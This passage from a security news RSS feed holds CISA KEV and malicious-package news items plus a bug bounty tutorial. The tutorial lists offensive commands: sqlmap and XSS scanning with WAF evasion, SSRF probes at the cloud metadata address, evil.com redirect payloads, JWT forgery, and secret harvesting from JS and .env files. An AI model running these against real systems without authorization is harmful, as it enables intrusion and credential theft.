<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-32432" target="_blank">CVE-2025-32432</a> Craft CMS Code Injection Vulnerability</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-43510" target="_blank">CVE-2025-43510</a> Apple Multiple Products Improper Locking Vulnerability</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-43520" target="_blank">CVE-2025-43520</a> Apple Multiple Products Classic Buffer Overflow Vulnerability</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-54068" target="_blank">CVE-2025-54068</a> Laravel Livewire Code Injection Vulnerability</li>
</ul>
<p>These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.</p>
<p><a href="https://www.cisa.gov/binding-operational-directive-22-01">Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities</a> established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the <a href="https://www.cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf">BOD 22-01 Fact Sheet</a> for more information.</p>
<p>Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" data-entity-type="node" data-entity-uuid="79453b83-86b9-4e2f-b1ec-abf73c6eb291" data-entity-substitution="canonical" title="Known Exploited Vulnerabilities Catalog">KEV Catalog vulnerabilities</a> as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the <a href="https://www.cisa.gov/known-exploited-vulnerabilities" data-entity-type="node" data-entity-uuid="f2adba9a-0404-494c-a90c-4363a4a5c934" data-entity-substitution="canonical" title="Reducing the Significant Risk of Known Exploited Vulnerabilities">specified criteria</a>. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[My Complete Bug Bounty Hunting Workflow Every Command I Use, Step by Step]]></title>
<description><![CDATA[From zero attack surface to critical vulnerability report the exact workflow I built as a beginner that still works todayFrom zero attack surface to critical vulnerability report the exact workflow I built as a beginner that still works todayWhen I started bug bounty hunting, I had no system.I wo...]]></description>
<link>https://tsecurity.de/de/3365544/hacking/my-complete-bug-bounty-hunting-workflow-every-command-i-use-step-by-step/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3365544/hacking/my-complete-bug-bounty-hunting-workflow-every-command-i-use-step-by-step/</guid>
<pubDate>Fri, 20 Mar 2026 04:36:44 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OJJcMZgN6QD8hrlPec6m3w.png"><figcaption><em>From zero attack surface to critical vulnerability report the exact workflow I built as a beginner that still works today</em></figcaption></figure><p><em>From zero attack surface to critical vulnerability report the exact workflow I built as a beginner that still works today</em></p><p>When I started bug bounty hunting, I had no system.</p><p>I would open a target, randomly poke around, find nothing, and give up after 2 hours. Sound familiar?</p><p>The turning point came when I stopped <em>exploring</em> and started <em>executing</em> — following a repeatable, structured workflow every single time.</p><p>This is that workflow. Every command. Every tool. Every step.</p><p>Copy it, customize it, own it. 🐛</p><h3>The Big Picture</h3><p>Before diving into commands, understand the flow:</p><pre>Attack Surface Mapping<br>        ↓<br>Vulnerability Hunting<br>        ↓<br>Business Logic &amp; API Hacking<br>        ↓<br>Secrets &amp; Sensitive Data<br>        ↓<br>Reporting &amp; Proof</pre><p>You don’t skip steps. You don’t jump to exploitation before recon. The hunters who skip recon are the ones who find nothing.</p><h3>Tools You Need First</h3><p>Install everything before starting:</p><pre># ProjectDiscovery Suite (Go required)<br>go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest<br>go install github.com/projectdiscovery/httpx/cmd/httpx@latest<br>go install github.com/projectdiscovery/katana/cmd/katana@latest<br>go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest<br><br># Other essentials<br>pip install sqlmap<br>npm install -g jwt-tool<br>go install github.com/tomnomnom/anew@latest<br>go install github.com/tomnomnom/gf@latest<br>go install github.com/lc/gau/v2/cmd/gau@latest<br>go install github.com/jaeles-project/gospider@latest</pre><h3>Step 1 — Attack Surface Mapping (Recon)</h3><p>This is where 80% of your success is decided. The bigger your attack surface, the more chances you have to find something.</p><h3>1.1 Subdomains Dhundho (4 Sources)</h3><p>Never rely on one source. Different tools find different subdomains:</p><pre>assetfinder --subs-only target.com | tee subs.txt<br>subfinder -d target.com -all -silent | anew subs.txt<br>amass enum -passive -d target.com | anew subs.txt<br>curl -s "https://crt.sh/?q=%.target.com" | grep -E "target.com" \<br>  | cut -d '&gt;' -f2 | cut -d '&lt;' -f1 | anew subs.txt</pre><blockquote><strong><em>Why 4 sources?</em></strong><em> Assetfinder finds subdomains that Subfinder misses. Amass finds what both miss. Certificate Transparency logs (crt.sh) reveal subdomains that were never meant to be public. Together, you get 90%+ coverage.</em></blockquote><h3>1.2 Live Hosts Check (Ports + Tech Stack)</h3><p>Not all subdomains are alive. Filter the dead ones:</p><pre>cat subs.txt | httpx -silent \<br>  -ports 80,443,8080,8443,3000 \<br>  -status-code -title -tech-detect -cdn \<br>  -o alive_hosts.txt<br><br>cat alive_hosts.txt | awk '{print $1}' &gt; alive_urls.txt</pre><p>The -tech-detect flag is gold — it tells you if a host is running WordPress, Laravel, Spring Boot, etc. Knowing the tech stack tells you <em>exactly</em> which CVEs and misconfigs to test.</p><h3>1.3 — URLs Collect Karo (5x Depth)</h3><p>Now spider every live host for URLs past, present, and hidden:</p><pre># Active crawling (5 levels deep)<br>cat alive_urls.txt | katana -silent -d 5 -jc -kf \<br>  -em js,png,jpg,css -o katana_urls.txt<br><br># Historical URLs from Wayback Machine<br>waybackurls target.com | anew wayback_urls.txt<br># GAU (Get All URLs) - indexes multiple sources<br>gau target.com | anew gau_urls.txt<br># Full spider with GoSpider<br>gospider -s "https://target.com" -o gospider_out -t 20<br># Merge everything, remove noise<br>cat *_urls.txt gospider_out/* | sort -u \<br>  | grep -vE '\.(css|jpg|png)' | anew all_urls.txt</pre><p>At this point you might have 10,000–50,000 URLs. That’s your hunting ground.</p><h3>Step 2 — Vulnerability Hunting (Auto + Manual)</h3><h3>2.1 Parameters Extract Karo</h3><p>Find every injectable parameter across all collected URLs:</p><pre># Extract all parameter names<br>cat all_urls.txt | grep "=" | sed 's/.*?//' \<br>  | cut -d '=' -f1 | sort -u &gt; params.txt<br><br># GF patterns (Tomnomnom's magic)<br>gf xss all_urls.txt &gt; xss_candidates.txt<br>gf sqli all_urls.txt &gt; sqli_candidates.txt</pre><h3>2.2 XSS Testing (DOM + Reflected)</h3><pre># Dalfox — best automated XSS scanner<br>cat xss_candidates.txt | dalfox pipe \<br>  --skip-bav --skip-mining-all \<br>  --waf-evasion -o xss_confirmed.txt<br><br># Nuclei XSS templates<br>nuclei -l alive_urls.txt \<br>  -t ~/nuclei-templates/xss/ \<br>  -severity medium,high \<br>  -o nuclei_xss.txt</pre><h3>2.3 SQLi (Error-Based + Blind)</h3><pre># SQLMap with evasion techniques<br>sqlmap -m sqli_candidates.txt --batch \<br>  --level=5 --risk=3 --random-agent \<br>  --tamper=between,charencode \<br>  --output-dir=sqlmap_logs<br><br># Nuclei SQLi templates<br>nuclei -l alive_urls.txt \<br>  -t ~/nuclei-templates/sql-injection/ \<br>  -severity critical \<br>  -o nuclei_sqli.tx</pre><h3>2.4 SSRF / Open Redirect</h3><pre># AWS Metadata SSRF test<br>cat all_urls.txt \<br>  | qsreplace "http://169.254.169.254/latest/meta-data" \<br>  | httpx -silent -path "/latest/meta-data" \<br>    -match-string "instance-id" \<br>  -o ssrf_aws.txt<br><br># Open Redirect test<br>cat all_urls.txt \<br>  | qsreplace "https://evil.com" \<br>  | httpx -fr -silent -match-string "evil.com" \<br>  -o redirects.txt</pre><h3>2.5 RCE / SSTI (Critical Vulns)</h3><pre># Nuclei RCE templates<br>nuclei -l alive_urls.txt \<br>  -t ~/nuclei-templates/rce/ \<br>  -severity critical \<br>  -o rce_results.txt<br><br># Template injection with Tplmap<br>tplmap -u 'https://target.com/profile?name=*' \<br>  --engine asterisk -o tplmap_report.txt</pre><h3>Step 3 Business Logic &amp; API Hacking</h3><p>This is where automation ends and thinking begins. No tool finds business logic bugs — only you can.</p><h3>3.1 Auth Bypass (JWT/Cookies)</h3><pre># JWT manipulation — try privilege escalation<br>jwt_tool &lt;JWT_TOKEN&gt; -T -cv "admin:true"<br><br># Cookie manipulation<br>curl -X POST https://target.com/login \<br>  -H "Cookie: session=invalid" \<br>  --data '{"admin":1}'</pre><h3>3.2 IDOR / UUID Prediction</h3><pre># Generate time-based UUIDs (UUIDv1 is predictable!)<br>for i in {1..100}; do uuidgen -t; done &gt; uuids.txt<br><br># Test them against API endpoints<br>curl -s "https://target.com/api/user/$(sed -n 1p uuids.txt)"</pre><blockquote><strong><em>Why does this work?</em></strong><em> UUIDv1 is time-based and sequential. If a developer used UUIDv1 thinking it was “unguessable,” you can predict neighboring UUIDs and access other users’ data — classic IDOR.</em></blockquote><h3>3.3 GraphQL Introspection</h3><pre># Check if schema introspection is enabled (should be disabled in production)<br>curl -X POST https://target.com/graphql \<br>  -d '{"query":"query {__schema{queryType{name}}}"}'</pre><p>If this returns schema data, the API is fully exposed. Map every query, mutation, and field — then test each one for authorization flaws.</p><h3>Step 4 — Secrets &amp; Sensitive Data</h3><h3>4.1 JS Files se API Keys</h3><pre>cat all_urls.txt | grep "\.js$" | httpx -silent \<br>  | xargs -I % sh -c 'echo % &amp;&amp; curl -s % \<br>  | grep -Eo "(api|key|token|secret|password)=[\"'"'"'][^\"'"'"']+[\"'"'"']"'</pre><p>JavaScript files are treasure chests. Developers hardcode API keys, internal endpoints, and credentials in JS files all the time — and forget them.</p><h3>4.2 Git / Env Files</h3><pre># Exposed .git/config<br>cat alive_urls.txt | httpx -path "/.git/config" -mc 200 -o git_exposed.txt<br># Exposed .env files<br>cat alive_urls.txt | httpx -path "/.env" -mc 200 -o env_files.txt</pre><p>Finding an exposed .env file is an <strong>instant Critical</strong>. It typically contains DB_PASSWORD, AWS_SECRET_KEY, STRIPE_SECRET, and more.</p><h3>Step 5 Reporting &amp; Proof</h3><p>Your finding is only as good as your report. A vague report gets closed as “Informational.” A detailed report with proof gets paid.</p><h3>5.1 Screenshots (Visual Proof)</h3><pre>gowitness file -f alive_urls.txt -P screenshots/</pre><h3>5.2 Auto-Generate Report (CSV Format)</h3><pre>echo "Vulnerability,URL,Payload,Impact" &gt; report.csv<br>cat xss_confirmed.txt | awk '{print "XSS," $1 ",payload=alert(1),High"}' &gt;&gt; report.csv<br>cat ssrf_aws.txt | awk '{print "SSRF," $1 ",AWS Metadata,Critical"}' &gt;&gt; report.csv</pre><h3>One-Line Full Scan (For Speed)</h3><p>When you want a quick critical-only scan on a new target:</p><pre>subfinder -d target.com | httpx -silent \<br>  | nuclei -t ~/nuclei-templates/ \<br>  -severity critical -o critical_vulns.txt</pre><p>Run this first. If Nuclei finds something critical immediately, investigate it. If not, go through the full workflow above.</p><h3>My 5 Advanced Rules</h3><p>These rules came from real experience — bugs I almost missed:</p><p><strong>1. “Boring” Endpoints Pe Focus Karo</strong></p><p>Most hunters ignore these. That’s exactly why they’re valuable:</p><ul><li>/health — sometimes exposes internal service data</li><li>/metrics — Prometheus metrics, internal stats</li><li>/phpinfo.php — server configuration leak</li><li>/console — sometimes an open admin console</li></ul><p><strong>2. Headers Ke Saath Khelo</strong></p><pre>X-Forwarded-Host: evil.com<br>X-Original-URL: /admin<br>X-Forwarded-For: 127.0.0.1</pre><p>Many applications trust these headers blindly — leading to SSRF, access control bypass, and cache poisoning.</p><p><strong>3. Parameter Pollution Test Karo</strong></p><pre>?id=123&amp;id=456</pre><p>Which ID does the server use — the first, the last, or both? This simple test has led to IDOR bypasses worth thousands of dollars.</p><p><strong>4. Error Messages Padho</strong></p><ul><li>MySQL error → SQLi possible</li><li>Stack trace → Full framework and path disclosure</li><li>“Access denied for user ‘root’” → Database credentials in error!</li></ul><p>Never dismiss an error message. It’s the application telling you its secrets.</p><p><strong>5. Automation 90%</strong></p><p>Automate the scanning. Manually investigate the results. For every 10 URLs your tools flag, manually test 1 in depth. The automation finds the leads — <em>your brain</em> closes the deal.</p><h3>Final Thought</h3><p>This workflow took me months to build, dozens of failed hunts to refine, and real bug bounty submissions to validate.</p><p>It’s not magic. It’s a system.</p><p>The hunters who earn consistently are not smarter than you — they just have better systems and run them more consistently.</p><p>Save this. Run it. Improve it. Make it yours.</p><p>Happy hunting. 🐛</p><p><em>I’m </em><strong><em>@HackerMD </em></strong><em>cybersecurity researcher and bug bounty hunter from India. Follow for real workflows, real writeups, and no fluff.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=68484276471f" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/my-complete-bug-bounty-hunting-workflow-every-command-i-use-step-by-step-68484276471f">My Complete Bug Bounty Hunting Workflow Every Command I Use, Step by Step</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[6 Malicious Packagist Themes Ship Trojanized jQuery in OphimCMS Supply Chain Attack]]></title>
<description><![CDATA[A new supply chain attack has targeted OphimCMS, a Vietnamese-language Laravel content management system widely used for building movie streaming websites. Six malicious Composer packages were published on Packagist under the ophimcms namespace, carefully disguised as legitimate themes for the pl...]]></description>
<link>https://tsecurity.de/de/3355416/it-security-nachrichten/6-malicious-packagist-themes-ship-trojanized-jquery-in-ophimcms-supply-chain-attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3355416/it-security-nachrichten/6-malicious-packagist-themes-ship-trojanized-jquery-in-ophimcms-supply-chain-attack/</guid>
<pubDate>Tue, 17 Mar 2026 14:21:17 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new supply chain attack has targeted OphimCMS, a Vietnamese-language Laravel content management system widely used for building movie streaming websites. Six malicious Composer packages were published on Packagist under the ophimcms namespace, carefully disguised as legitimate themes for the platform. Each package carries trojanized JavaScript assets — primarily fake jQuery libraries — designed to redirect visitors, […]</p>
<p>The post <a href="https://cybersecuritynews.com/6-malicious-packagist-themes-ship-trojanized-jquery/">6 Malicious Packagist Themes Ship Trojanized jQuery in OphimCMS Supply Chain Attack</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Packagist Themes Deliver Trojanized jQuery in OphimCMS Supply Chain Attack]]></title>
<description><![CDATA[A new OphimCMS supply chain attack in which six Packagist themes ship trojanized jQuery and other JavaScript to compromise site visitors rather than servers.​ Researchers found six malicious Composer packages under the “ophimcms” namespace on Packagist that pretend to be legitimate themes for Oph...]]></description>
<link>https://tsecurity.de/de/3354832/it-security-nachrichten/packagist-themes-deliver-trojanized-jquery-in-ophimcms-supply-chain-attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3354832/it-security-nachrichten/packagist-themes-deliver-trojanized-jquery-in-ophimcms-supply-chain-attack/</guid>
<pubDate>Tue, 17 Mar 2026 11:05:39 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new OphimCMS supply chain attack in which six Packagist themes ship trojanized jQuery and other JavaScript to compromise site visitors rather than servers.​ Researchers found six malicious Composer packages under the “ophimcms” namespace on Packagist that pretend to be legitimate themes for OphimCMS, a Vietnamese-language Laravel CMS used for movie streaming sites. These packages […]</p>
<p>The post <a href="https://gbhackers.com/jquery-in-ophimcms/">Packagist Themes Deliver Trojanized jQuery in OphimCMS Supply Chain Attack</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Six Malicious Packagist Themes Deliver Trojanized jQuery Payloads]]></title>
<description><![CDATA[Security researchers have identified six malicious Composer packages on Packagist that claim to be legitimate OphimCMS themes, a Laravel-based content management system used for movie streaming websites. The packages were published under the ophimcms namespace and were designed to look like norma...]]></description>
<link>https://tsecurity.de/de/3345883/it-security-nachrichten/six-malicious-packagist-themes-deliver-trojanized-jquery-payloads/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3345883/it-security-nachrichten/six-malicious-packagist-themes-deliver-trojanized-jquery-payloads/</guid>
<pubDate>Fri, 13 Mar 2026 09:49:26 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Security researchers have identified six malicious Composer packages on Packagist that claim to be legitimate OphimCMS themes, a Laravel-based content management system used for movie streaming websites. The packages were published under the ophimcms namespace and were designed to look like normal theme files. But instead of only delivering front-end code, they secretly shipped trojanized […]</p>
<p>The post <a href="https://cyberpress.org/packagist-themes-ship-malware/">Six Malicious Packagist Themes Deliver Trojanized jQuery Payloads</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeScout vulnerability enables unauthenticated, zero-click RCE via email (CVE-2026-28289)]]></title>
<description><![CDATA[A newly discovered vulnerability (CVE-2026-28289) in the open-source help desk platform FreeScout could allow attackers to take over vulnerable servers by sending a specially crafted email to a FreeScout mailbox. CVE-2026-28289 exploitation FreeScout is a free, open-source help desk and shared in...]]></description>
<link>https://tsecurity.de/de/3327572/it-security-nachrichten/freescout-vulnerability-enables-unauthenticated-zero-click-rce-via-email-cve-2026-28289/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3327572/it-security-nachrichten/freescout-vulnerability-enables-unauthenticated-zero-click-rce-via-email-cve-2026-28289/</guid>
<pubDate>Thu, 05 Mar 2026 12:21:44 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly discovered vulnerability (CVE-2026-28289) in the open-source help desk platform FreeScout could allow attackers to take over vulnerable servers by sending a specially crafted email to a FreeScout mailbox. CVE-2026-28289 exploitation FreeScout is a free, open-source help desk and shared inbox system used by businesses or teams to manage customer support conversations in one place. It is built with PHP (Laravel) and MySQL, and it’s designed to be self-hosted – either on-premises, on a … <a href="https://www.helpnetsecurity.com/2026/03/05/freescout-vulnerability-cve-2026-28289/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/03/05/freescout-vulnerability-cve-2026-28289/">FreeScout vulnerability enables unauthenticated, zero-click RCE via email (CVE-2026-28289)</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Malicious Laravel Packages Deploy PHP RAT, Compromise Web Servers]]></title>
<description><![CDATA[Socket’s Threat Research Team has identified a remote access trojan (RAT) distributed through several PHP packages published on Packagist by the actor behind the username nhattuanbl. These malicious packages, disguised as useful Laravel utilities, have been observed installing a persistent backdo...]]></description>
<link>https://tsecurity.de/de/3327046/it-security-nachrichten/malicious-laravel-packages-deploy-php-rat-compromise-web-servers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3327046/it-security-nachrichten/malicious-laravel-packages-deploy-php-rat-compromise-web-servers/</guid>
<pubDate>Thu, 05 Mar 2026 08:20:45 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Socket’s Threat Research Team has identified a remote access trojan (RAT) distributed through several PHP packages published on Packagist by the actor behind the username nhattuanbl. These malicious packages, disguised as useful Laravel utilities, have been observed installing a persistent backdoor that allows remote access to web servers. The identified packages, nhattuanbl/lara-helper and nhattuanbl/simple-queue, contain […]</p>
<p>The post <a href="https://cyberpress.org/malicious-laravel-packages-deploy-rat/">Malicious Laravel Packages Deploy PHP RAT, Compromise Web Servers</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gefälschte Laravel-Pakete verbreiten gefährlichen RAT]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Sicherheitsforscher haben bösartige PHP-Pakete auf Packagist entdeckt, die sich als Laravel-Utilities tarnen und einen plattformübergreifenden Remote-Access-Trojaner (RAT) verbreiten. Diese Bedrohung betrifft Windows, macOS und Linux und stellt ein erhebliches Risiko für En...]]></description>
<link>https://tsecurity.de/de/3325562/it-security-nachrichten/gefaelschte-laravel-pakete-verbreiten-gefaehrlichen-rat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3325562/it-security-nachrichten/gefaelschte-laravel-pakete-verbreiten-gefaehrlichen-rat/</guid>
<pubDate>Wed, 04 Mar 2026 15:49:05 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-malicious-laravel-packages.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-malicious-laravel-packages.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-malicious-laravel-packages-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-malicious-laravel-packages-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-malicious-laravel-packages-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-malicious-laravel-packages-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-malicious-laravel-packages-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Sicherheitsforscher haben bösartige PHP-Pakete auf Packagist entdeckt, die sich als Laravel-Utilities tarnen und einen plattformübergreifenden Remote-Access-Trojaner (RAT) verbreiten. Diese Bedrohung betrifft Windows, macOS und Linux und stellt ein erhebliches Risiko für Entwickler dar. In der Welt der Cybersicherheit ist die Entdeckung von bösartigen Softwarepaketen keine Seltenheit, doch die jüngsten Enthüllungen über […]</p>
<div><a href="https://www.it-boltwise.de/gefaelschte-laravel-pakete-verbreiten-gefaehrlichen-rat.html">... den vollständigen Artikel <strong>»Gefälschte Laravel-Pakete verbreiten gefährlichen RAT«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/gefaelschte-laravel-pakete-verbreiten-gefaehrlichen-rat.html">Gefälschte Laravel-Pakete verbreiten gefährlichen RAT</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE® x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Laravel Packages on Packagist Deploy RAT on Windows, macOS, and Linux]]></title>
<description><![CDATA[Cybersecurity researchers have flagged malicious Packagist PHP packages masquerading as Laravel utilities that act as a conduit for a cross-platform remote access trojan (RAT) that’s functional on Windows, macOS, and Linux systems. The names of the packages are listed below…
Read more →
The post ...]]></description>
<link>https://tsecurity.de/de/3324784/it-security-nachrichten/fake-laravel-packages-on-packagist-deploy-rat-on-windows-macos-and-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3324784/it-security-nachrichten/fake-laravel-packages-on-packagist-deploy-rat-on-windows-macos-and-linux/</guid>
<pubDate>Wed, 04 Mar 2026 11:22:54 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybersecurity researchers have flagged malicious Packagist PHP packages masquerading as Laravel utilities that act as a conduit for a cross-platform remote access trojan (RAT) that’s functional on Windows, macOS, and Linux systems. The names of the packages are listed below…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/fake-laravel-packages-on-packagist-deploy-rat-on-windows-macos-and-linux/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/fake-laravel-packages-on-packagist-deploy-rat-on-windows-macos-and-linux/">Fake Laravel Packages on Packagist Deploy RAT on Windows, macOS, and Linux</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Laravel Packages on Packagist Deploy RAT on Windows, macOS, and Linux]]></title>
<description><![CDATA[Cybersecurity researchers have flagged malicious Packagist PHP packages masquerading as Laravel utilities that act as a conduit for a cross-platform remote access trojan (RAT) that's functional on Windows, macOS, and Linux systems.
The names of the packages are listed below -

nhattuanbl/lara-hel...]]></description>
<link>https://tsecurity.de/de/3324746/it-security-nachrichten/fake-laravel-packages-on-packagist-deploy-rat-on-windows-macos-and-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3324746/it-security-nachrichten/fake-laravel-packages-on-packagist-deploy-rat-on-windows-macos-and-linux/</guid>
<pubDate>Wed, 04 Mar 2026 11:06:47 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity researchers have flagged malicious Packagist PHP packages masquerading as Laravel utilities that act as a conduit for a cross-platform remote access trojan (RAT) that's functional on Windows, macOS, and Linux systems.
The names of the packages are listed below -

nhattuanbl/lara-helper (37 Downloads)
nhattuanbl/simple-queue (29 Downloads)
nhattuanbl/lara-swagger (49 Downloads)]]></content:encoded>
</item>
<item>
<title><![CDATA[Malicious Packages Disguised as Laravel Utilities Deploy PHP RAT and Enables Remote Access]]></title>
<description><![CDATA[A supply chain attack targeting the PHP developer community has surfaced through Packagist, the official package repository for PHP and Laravel projects. Threat actor nhattuanbl published several packages that disguised a fully functional remote access trojan (RAT) inside what looked like standar...]]></description>
<link>https://tsecurity.de/de/3324447/it-security-nachrichten/malicious-packages-disguised-as-laravel-utilities-deploy-php-rat-and-enables-remote-access/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3324447/it-security-nachrichten/malicious-packages-disguised-as-laravel-utilities-deploy-php-rat-and-enables-remote-access/</guid>
<pubDate>Wed, 04 Mar 2026 08:50:47 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A supply chain attack targeting the PHP developer community has surfaced through Packagist, the official package repository for PHP and Laravel projects. Threat actor nhattuanbl published several packages that disguised a fully functional remote access trojan (RAT) inside what looked like standard…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/malicious-packages-disguised-as-laravel-utilities-deploy-php-rat-and-enables-remote-access/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/malicious-packages-disguised-as-laravel-utilities-deploy-php-rat-and-enables-remote-access/">Malicious Packages Disguised as Laravel Utilities Deploy PHP RAT and Enables Remote Access</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Malicious Packages Disguised as Laravel Utilities Deploy PHP RAT and Enables Remote Access]]></title>
<description><![CDATA[A supply chain attack targeting the PHP developer community has surfaced through Packagist, the official package repository for PHP and Laravel projects. Threat actor nhattuanbl published several packages that disguised a fully functional remote access trojan (RAT) inside what looked like standar...]]></description>
<link>https://tsecurity.de/de/3324421/it-security-nachrichten/malicious-packages-disguised-as-laravel-utilities-deploy-php-rat-and-enables-remote-access/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3324421/it-security-nachrichten/malicious-packages-disguised-as-laravel-utilities-deploy-php-rat-and-enables-remote-access/</guid>
<pubDate>Wed, 04 Mar 2026 08:35:32 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A supply chain attack targeting the PHP developer community has surfaced through Packagist, the official package repository for PHP and Laravel projects. Threat actor nhattuanbl published several packages that disguised a fully functional remote access trojan (RAT) inside what looked like standard Laravel utility libraries, giving attackers silent and persistent control over any system that installed them. […]</p>
<p>The post <a href="https://cybersecuritynews.com/malicious-packages-disguised-as-laravel-utilities/">Malicious Packages Disguised as Laravel Utilities Deploy PHP RAT and Enables Remote Access</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Malicious Laravel Packages Deploy PHP RAT, Grant Remote Access to Attackers]]></title>
<description><![CDATA[Malicious Packagist packages masquerading as Laravel helper utilities are delivering an obfuscated PHP remote access trojan (RAT) that grants full remote control over compromised hosts. Two of these, nhattuanbl/lara-helper and nhattuanbl/simple-queue, embed a byte‑for‑byte identical RAT payload i...]]></description>
<link>https://tsecurity.de/de/3324225/it-security-nachrichten/malicious-laravel-packages-deploy-php-rat-grant-remote-access-to-attackers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3324225/it-security-nachrichten/malicious-laravel-packages-deploy-php-rat-grant-remote-access-to-attackers/</guid>
<pubDate>Wed, 04 Mar 2026 06:34:36 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Malicious Packagist packages masquerading as Laravel helper utilities are delivering an obfuscated PHP remote access trojan (RAT) that grants full remote control over compromised hosts. Two of these, nhattuanbl/lara-helper and nhattuanbl/simple-queue, embed a byte‑for‑byte identical RAT payload in src/helper.php. A third package, nhattuanbl/lara-swagger, appears benign…</p>
